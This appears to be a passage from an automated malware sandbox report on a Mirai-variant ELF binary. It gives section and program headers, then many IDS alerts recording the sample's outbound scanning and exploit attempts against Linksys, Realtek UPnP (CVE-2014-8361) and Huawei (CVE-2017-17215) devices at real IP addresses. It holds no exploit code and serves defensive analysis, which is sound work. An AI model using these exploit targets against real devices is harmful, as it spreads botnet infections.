                .initPROGBITS0x4000940x940x2e0x00x6AX004
                .textPROGBITS0x4000e00xe00x105800x00x6AX0032
                .finiPROGBITS0x4106600x106600x220x00x6AX004
                .rodataPROGBITS0x4106840x106840x14b80x00x2A004
                .ctorsPROGBITS0x4220740x120740x80x00x3WA004
                .dtorsPROGBITS0x42207c0x1207c0x80x00x3WA004
                .dataPROGBITS0x4220880x120880x480x00x3WA004
                .bssNOBITS0x4220d00x120d00xa080x00x3WA004
                .shstrtabSTRTAB0x00x120d00x3e0x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x4000000x4000000x11b3c0x11b3c4.62610x5R E0x10000.init .text .fini .rodata
                LOAD0x120740x4220740x4220740x5c0xa641.37300x6RW 0x10000.ctors .dtors .data .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.2395.58.74.1040992802027121 05/14/22-02:12:12.430631TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4099280192.168.2.2395.58.74.10
                192.168.2.23112.199.99.10646420802027121 05/14/22-02:11:57.622916TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4642080192.168.2.23112.199.99.106
                192.168.2.2395.168.221.10733586802027121 05/14/22-02:12:03.534733TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3358680192.168.2.2395.168.221.107
                192.168.2.2388.166.177.10143818802027121 05/14/22-02:13:00.629220TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4381880192.168.2.2388.166.177.101
                192.168.2.2395.100.34.12649972802027121 05/14/22-02:12:08.603488TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4997280192.168.2.2395.100.34.126
                192.168.2.2395.100.94.17943008802027121 05/14/22-02:12:47.773346TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4300880192.168.2.2395.100.94.179
                192.168.2.2395.97.118.8352268802027121 05/14/22-02:13:23.496514TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5226880192.168.2.2395.97.118.83
                192.168.2.2395.217.218.15945052802027121 05/14/22-02:12:01.397227TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4505280192.168.2.2395.217.218.159
                192.168.2.2395.216.95.11347718802027121 05/14/22-02:11:52.570414TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4771880192.168.2.2395.216.95.113
                192.168.2.23172.81.184.18459202555552027153 05/14/22-02:13:37.089436TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5920255555192.168.2.23172.81.184.184
                192.168.2.23156.226.67.16341018528692027339 05/14/22-02:12:09.245036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4101852869192.168.2.23156.226.67.163
                192.168.2.2395.78.119.7247502802027121 05/14/22-02:11:52.607486TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4750280192.168.2.2395.78.119.72
                192.168.2.2395.100.118.20437132802027121 05/14/22-02:11:52.802504TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3713280192.168.2.2395.100.118.204
                192.168.2.2395.58.76.9256110802027121 05/14/22-02:12:10.137372TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5611080192.168.2.2395.58.76.92
                192.168.2.2395.100.32.17844078802027121 05/14/22-02:12:38.576645TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4407880192.168.2.2395.100.32.178
                192.168.2.23172.245.91.21846486555552027153 05/14/22-02:11:53.481665TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4648655555192.168.2.23172.245.91.218
                192.168.2.2395.101.211.18138602802027121 05/14/22-02:11:46.055471TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3860280192.168.2.2395.101.211.181
                192.168.2.23156.250.7.20843406528692027339 05/14/22-02:12:44.093160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4340652869192.168.2.23156.250.7.208
                192.168.2.2395.211.199.20060430802027121 05/14/22-02:11:50.384445TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6043080192.168.2.2395.211.199.200
                192.168.2.23156.240.107.7347070528692027339 05/14/22-02:12:25.163577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4707052869192.168.2.23156.240.107.73
                192.168.2.23172.65.182.21341474555552027153 05/14/22-02:12:39.507650TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4147455555192.168.2.23172.65.182.213
                192.168.2.23156.244.105.5134840528692027339 05/14/22-02:13:21.351383TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3484052869192.168.2.23156.244.105.51
                192.168.2.2395.101.243.19935434802027121 05/14/22-02:12:04.777246TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3543480192.168.2.2395.101.243.199
                192.168.2.23172.245.250.17236862555552027153 05/14/22-02:12:19.660814TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3686255555192.168.2.23172.245.250.172
                192.168.2.2395.211.226.13853290802027121 05/14/22-02:11:52.555956TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5329080192.168.2.2395.211.226.138
                192.168.2.2395.43.238.15338478802027121 05/14/22-02:12:01.401310TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3847880192.168.2.2395.43.238.153
                192.168.2.23172.65.37.25050424555552027153 05/14/22-02:12:56.874950TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5042455555192.168.2.23172.65.37.250
                192.168.2.2395.213.204.3958836802027121 05/14/22-02:12:23.962062TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5883680192.168.2.2395.213.204.39
                192.168.2.2395.181.133.20233726802027121 05/14/22-02:12:16.233664TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3372680192.168.2.2395.181.133.202
                192.168.2.2395.57.130.22852484802027121 05/14/22-02:12:28.116329TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5248480192.168.2.2395.57.130.228
                192.168.2.2395.216.222.1047996802027121 05/14/22-02:12:06.989256TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4799680192.168.2.2395.216.222.10
                192.168.2.2388.122.230.16741686802027121 05/14/22-02:13:08.893196TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4168680192.168.2.2388.122.230.167
                192.168.2.2388.150.159.10657996802027121 05/14/22-02:12:39.841136TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5799680192.168.2.2388.150.159.106
                192.168.2.23156.235.111.19833534528692027339 05/14/22-02:13:20.938260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3353452869192.168.2.23156.235.111.198
                192.168.2.23172.65.24.9855186555552027153 05/14/22-02:12:20.938724TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5518655555192.168.2.23172.65.24.98
                192.168.2.2395.179.134.1036172802027121 05/14/22-02:12:25.912986TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3617280192.168.2.2395.179.134.10
                192.168.2.2395.101.105.3756502802027121 05/14/22-02:12:16.074396TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5650280192.168.2.2395.101.105.37
                192.168.2.2395.164.218.8357352802027121 05/14/22-02:12:33.749896TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5735280192.168.2.2395.164.218.83
                192.168.2.2395.159.26.3544678802027121 05/14/22-02:12:23.922852TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4467880192.168.2.2395.159.26.35
                192.168.2.23156.235.96.9045400528692027339 05/14/22-02:12:34.950230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4540052869192.168.2.23156.235.96.90
                192.168.2.2395.217.206.17745218802027121 05/14/22-02:12:04.810301TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4521880192.168.2.2395.217.206.177
                192.168.2.2388.49.177.24935962802027121 05/14/22-02:13:40.811485TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3596280192.168.2.2388.49.177.249
                192.168.2.2395.131.158.15946656802027121 05/14/22-02:12:31.381907TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4665680192.168.2.2395.131.158.159
                192.168.2.23172.65.201.24153716555552027153 05/14/22-02:12:16.062221TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5371655555192.168.2.23172.65.201.241
                192.168.2.2395.100.82.23444534802027121 05/14/22-02:12:12.340577TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4453480192.168.2.2395.100.82.234
                192.168.2.23172.65.118.14737452555552027153 05/14/22-02:11:50.031237TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3745255555192.168.2.23172.65.118.147
                192.168.2.2395.57.134.4659286802027121 05/14/22-02:12:48.996838TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5928680192.168.2.2395.57.134.46
                192.168.2.23172.65.172.4134814555552027153 05/14/22-02:13:11.806884TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3481455555192.168.2.23172.65.172.41
                192.168.2.23172.65.210.22942204555552027153 05/14/22-02:12:18.507816TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4220455555192.168.2.23172.65.210.229
                192.168.2.2395.94.218.4357504802027121 05/14/22-02:11:57.972753TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5750480192.168.2.2395.94.218.43
                192.168.2.2395.154.249.12134130802027121 05/14/22-02:12:45.473782TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3413080192.168.2.2395.154.249.121
                192.168.2.23172.65.128.24559816555552027153 05/14/22-02:13:11.806767TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5981655555192.168.2.23172.65.128.245
                192.168.2.2395.101.96.5152158802027121 05/14/22-02:13:29.557034TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5215880192.168.2.2395.101.96.51
                192.168.2.2388.203.246.6251484802027121 05/14/22-02:12:51.238182TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5148480192.168.2.2388.203.246.62
                192.168.2.2395.90.162.18347524802027121 05/14/22-02:12:04.810631TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4752480192.168.2.2395.90.162.183
                192.168.2.2395.239.27.7847704802027121 05/14/22-02:13:06.625005TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4770480192.168.2.2395.239.27.78
                192.168.2.2395.100.205.7053328802027121 05/14/22-02:12:03.636693TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5332880192.168.2.2395.100.205.70
                192.168.2.23172.65.151.7759744555552027153 05/14/22-02:11:51.219344TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5974455555192.168.2.23172.65.151.77
                192.168.2.2395.100.59.12043352802027121 05/14/22-02:11:45.945989TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4335280192.168.2.2395.100.59.120
                192.168.2.23172.65.153.17343894555552027153 05/14/22-02:13:39.296017TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4389455555192.168.2.23172.65.153.173
                192.168.2.2395.164.217.3256864802027121 05/14/22-02:12:21.706568TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5686480192.168.2.2395.164.217.32
                192.168.2.2395.209.130.24155784802027121 05/14/22-02:12:28.187173TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5578480192.168.2.2395.209.130.241
                192.168.2.2388.210.164.5859344802027121 05/14/22-02:13:46.124204TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5934480192.168.2.2388.210.164.58
                192.168.2.23172.65.250.15159336555552027153 05/14/22-02:13:19.724871TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5933655555192.168.2.23172.65.250.151
                192.168.2.2395.216.165.11859550802027121 05/14/22-02:12:33.730744TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5955080192.168.2.2395.216.165.118
                192.168.2.2395.229.119.8750144802027121 05/14/22-02:12:16.135372TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5014480192.168.2.2395.229.119.87
                192.168.2.2395.174.97.23347994802027121 05/14/22-02:13:32.979753TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4799480192.168.2.2395.174.97.233
                192.168.2.2395.58.79.12560124802027121 05/14/22-02:12:23.981113TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6012480192.168.2.2395.58.79.125
                192.168.2.23172.65.167.20434184555552027153 05/14/22-02:13:44.962414TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3418455555192.168.2.23172.65.167.204
                192.168.2.2395.80.201.23847450802027121 05/14/22-02:12:16.046839TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4745080192.168.2.2395.80.201.238
                192.168.2.2395.159.51.7337054802027121 05/14/22-02:12:08.430878TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3705480192.168.2.2395.159.51.73
                192.168.2.23156.241.123.15756836528692027339 05/14/22-02:12:54.094946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5683652869192.168.2.23156.241.123.157
                192.168.2.2395.141.200.19460076802027121 05/14/22-02:12:21.758371TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6007680192.168.2.2395.141.200.194
                192.168.2.2395.101.185.5038634802027121 05/14/22-02:12:38.371591TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3863480192.168.2.2395.101.185.50
                192.168.2.23156.241.84.24033824528692027339 05/14/22-02:12:28.673321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3382452869192.168.2.23156.241.84.240
                192.168.2.2395.179.143.20351242802027121 05/14/22-02:12:18.506552TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5124280192.168.2.2395.179.143.203
                192.168.2.2395.0.30.5660942802027121 05/14/22-02:13:00.841883TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6094280192.168.2.2395.0.30.56
                192.168.2.2395.86.72.5855354802027121 05/14/22-02:13:14.880883TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5535480192.168.2.2395.86.72.58
                192.168.2.2395.97.138.22648964802027121 05/14/22-02:12:57.594704TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4896480192.168.2.2395.97.138.226
                192.168.2.23172.65.104.20234854555552027153 05/14/22-02:13:36.964682TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3485455555192.168.2.23172.65.104.202
                192.168.2.23172.65.219.16846204555552027153 05/14/22-02:13:08.554661TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4620455555192.168.2.23172.65.219.168
                192.168.2.2388.87.173.19839632802027121 05/14/22-02:13:19.388360TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3963280192.168.2.2388.87.173.198
                192.168.2.23172.81.184.18459304555552027153 05/14/22-02:13:40.473105TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5930455555192.168.2.23172.81.184.184
                192.168.2.2395.77.28.15555294802027121 05/14/22-02:13:20.332969TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5529480192.168.2.2395.77.28.155
                192.168.2.23172.65.254.15633828555552027153 05/14/22-02:12:11.570207TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3382855555192.168.2.23172.65.254.156
                192.168.2.2395.217.158.13150124802027121 05/14/22-02:12:16.061650TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5012480192.168.2.2395.217.158.131
                192.168.2.23172.65.114.9144870555552027153 05/14/22-02:12:34.796192TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4487055555192.168.2.23172.65.114.91
                192.168.2.23184.105.8.21455800555552027153 05/14/22-02:12:52.633661TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5580055555192.168.2.23184.105.8.214
                192.168.2.2395.101.44.24046514802027121 05/14/22-02:12:38.385188TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4651480192.168.2.2395.101.44.240
                192.168.2.2395.47.138.16839922802027121 05/14/22-02:12:47.737611TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3992280192.168.2.2395.47.138.168
                192.168.2.2395.209.147.14345778802027121 05/14/22-02:12:52.880233TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4577880192.168.2.2395.209.147.143
                192.168.2.2395.100.6.16650622802027121 05/14/22-02:12:38.425801TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5062280192.168.2.2395.100.6.166
                192.168.2.23156.247.30.22451048528692027339 05/14/22-02:12:53.901304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5104852869192.168.2.23156.247.30.224
                192.168.2.2395.101.178.8946468802027121 05/14/22-02:11:57.639904TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4646880192.168.2.2395.101.178.89
                192.168.2.23197.244.233.15040306372152835222 05/14/22-02:11:51.051598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030637215192.168.2.23197.244.233.150
                192.168.2.2395.65.107.22051454802027121 05/14/22-02:11:55.090650TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5145480192.168.2.2395.65.107.220
                192.168.2.2395.90.100.20642786802027121 05/14/22-02:13:06.577911TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4278680192.168.2.2395.90.100.206
                192.168.2.2395.250.235.4243474802027121 05/14/22-02:11:52.862391TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4347480192.168.2.2395.250.235.42
                192.168.2.2395.61.201.12438168802027121 05/14/22-02:13:04.224191TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3816880192.168.2.2395.61.201.124
                192.168.2.2388.249.225.1853758802027121 05/14/22-02:13:19.402088TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5375880192.168.2.2388.249.225.18
                192.168.2.23172.245.25.10652588555552027153 05/14/22-02:13:19.821621TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5258855555192.168.2.23172.245.25.106
                192.168.2.2395.216.103.12651132802027121 05/14/22-02:12:00.196178TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5113280192.168.2.2395.216.103.126
                192.168.2.2395.143.57.7852982802027121 05/14/22-02:12:04.729513TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5298280192.168.2.2395.143.57.78
                192.168.2.23156.244.70.10233740528692027339 05/14/22-02:13:13.435280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3374052869192.168.2.23156.244.70.102
                192.168.2.2395.59.176.8254556802027121 05/14/22-02:13:33.021265TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5455680192.168.2.2395.59.176.82
                192.168.2.2395.100.1.5849178802027121 05/14/22-02:11:48.348956TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4917880192.168.2.2395.100.1.58
                192.168.2.2395.214.135.17752978802027121 05/14/22-02:12:04.793804TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5297880192.168.2.2395.214.135.177
                192.168.2.2395.101.46.19543134802027121 05/14/22-02:12:13.698098TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4313480192.168.2.2395.101.46.195
                192.168.2.2395.216.173.24048368802027121 05/14/22-02:12:21.633415TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4836880192.168.2.2395.216.173.240
                192.168.2.2395.241.182.14738286802027121 05/14/22-02:13:29.655470TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3828680192.168.2.2395.241.182.147
                192.168.2.2395.168.228.20548254802027121 05/14/22-02:12:12.332916TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4825480192.168.2.2395.168.228.205
                192.168.2.23172.65.127.3248576555552027153 05/14/22-02:12:11.570325TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4857655555192.168.2.23172.65.127.32
                192.168.2.23197.246.204.4543450372152835222 05/14/22-02:12:18.232296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345037215192.168.2.23197.246.204.45
                192.168.2.23172.65.246.12360432555552027153 05/14/22-02:13:32.017204TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6043255555192.168.2.23172.65.246.123
                192.168.2.2395.100.34.12649942802027121 05/14/22-02:12:08.354729TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4994280192.168.2.2395.100.34.126
                192.168.2.23172.65.187.18739546555552027153 05/14/22-02:12:18.490698TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3954655555192.168.2.23172.65.187.187
                192.168.2.2395.217.202.21857140802027121 05/14/22-02:12:33.688142TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5714080192.168.2.2395.217.202.218
                192.168.2.23156.244.117.6735262528692027339 05/14/22-02:13:29.101550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3526252869192.168.2.23156.244.117.67
                192.168.2.2395.9.132.13054534802027121 05/14/22-02:12:09.942371TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5453480192.168.2.2395.9.132.130
                192.168.2.23172.65.207.17255164555552027153 05/14/22-02:12:51.455000TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5516455555192.168.2.23172.65.207.172
                192.168.2.23156.235.102.24651258528692027339 05/14/22-02:12:57.282371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5125852869192.168.2.23156.235.102.246
                192.168.2.23172.65.165.8142906555552027153 05/14/22-02:12:20.938959TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4290655555192.168.2.23172.65.165.81
                192.168.2.23172.65.220.23039706555552027153 05/14/22-02:13:40.490274TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3970655555192.168.2.23172.65.220.230
                192.168.2.2395.211.206.8055016802027121 05/14/22-02:12:21.658731TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5501680192.168.2.2395.211.206.80
                192.168.2.2395.59.17.5441456802027121 05/14/22-02:12:57.823951TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4145680192.168.2.2395.59.17.54
                192.168.2.2395.76.246.19645190802027121 05/14/22-02:12:09.885059TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4519080192.168.2.2395.76.246.196
                192.168.2.2395.209.155.9051672802027121 05/14/22-02:11:50.439816TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5167280192.168.2.2395.209.155.90
                192.168.2.23172.65.232.20460168555552027153 05/14/22-02:13:25.199760TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6016855555192.168.2.23172.65.232.204
                192.168.2.2395.100.77.14644630802027121 05/14/22-02:12:01.373432TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4463080192.168.2.2395.100.77.146
                192.168.2.23172.65.31.22744132555552027153 05/14/22-02:11:53.487585TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4413255555192.168.2.23172.65.31.227
                192.168.2.2395.57.72.060930802027121 05/14/22-02:12:48.985965TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6093080192.168.2.2395.57.72.0
                192.168.2.2395.101.45.15553358802027121 05/14/22-02:12:04.731576TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5335880192.168.2.2395.101.45.155
                192.168.2.2395.87.101.10137896802027121 05/14/22-02:12:09.913804TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3789680192.168.2.2395.87.101.101
                192.168.2.2395.101.128.23660108802027121 05/14/22-02:13:28.455410TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6010880192.168.2.2395.101.128.236
                192.168.2.2395.142.205.9451290802027121 05/14/22-02:11:46.047218TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5129080192.168.2.2395.142.205.94
                192.168.2.2388.193.167.16734318802027121 05/14/22-02:13:46.134686TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3431880192.168.2.2388.193.167.167
                192.168.2.2395.70.197.19856656802027121 05/14/22-02:12:31.405561TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5665680192.168.2.2395.70.197.198
                192.168.2.23172.65.164.5346232555552027153 05/14/22-02:13:23.081529TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4623255555192.168.2.23172.65.164.53
                192.168.2.2395.225.205.13049890802027121 05/14/22-02:12:04.853611TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4989080192.168.2.2395.225.205.130
                192.168.2.2395.100.50.13952924802027121 05/14/22-02:12:08.365983TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5292480192.168.2.2395.100.50.139
                192.168.2.23156.241.125.9145474528692027339 05/14/22-02:12:41.657241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4547452869192.168.2.23156.241.125.91
                192.168.2.2395.9.125.14353942802027121 05/14/22-02:12:13.735890TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5394280192.168.2.2395.9.125.143
                192.168.2.23156.232.92.24755310528692027339 05/14/22-02:12:25.129479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5531052869192.168.2.23156.232.92.247
                192.168.2.2395.90.154.22936880802027121 05/14/22-02:12:12.602828TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3688080192.168.2.2395.90.154.229
                192.168.2.2395.216.15.13056598802027121 05/14/22-02:12:21.676533TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5659880192.168.2.2395.216.15.130
                192.168.2.2395.142.10.21251574802027121 05/14/22-02:12:25.898635TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5157480192.168.2.2395.142.10.212
                192.168.2.2395.110.175.2748086802027121 05/14/22-02:11:50.439638TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4808680192.168.2.2395.110.175.27
                192.168.2.2395.216.36.21353936802027121 05/14/22-02:12:03.575828TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5393680192.168.2.2395.216.36.213
                192.168.2.2395.101.218.17560614802027121 05/14/22-02:12:33.782516TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6061480192.168.2.2395.101.218.175
                192.168.2.2395.140.158.2838122802027121 05/14/22-02:11:46.150628TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3812280192.168.2.2395.140.158.28
                192.168.2.2395.163.132.2455816802027121 05/14/22-02:11:52.586510TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5581680192.168.2.2395.163.132.24
                192.168.2.23172.65.206.17358940555552027153 05/14/22-02:12:01.300119TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5894055555192.168.2.23172.65.206.173
                192.168.2.23172.65.177.13744728555552027153 05/14/22-02:13:32.012600TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4472855555192.168.2.23172.65.177.137
                192.168.2.2395.179.233.6956756802027121 05/14/22-02:11:48.288985TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5675680192.168.2.2395.179.233.69
                192.168.2.23172.65.2.844980555552027153 05/14/22-02:12:11.570145TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4498055555192.168.2.23172.65.2.8
                192.168.2.23172.65.117.6952368555552027153 05/14/22-02:13:43.822344TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5236855555192.168.2.23172.65.117.69
                192.168.2.2395.159.7.4138836802027121 05/14/22-02:11:52.872714TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3883680192.168.2.2395.159.7.41
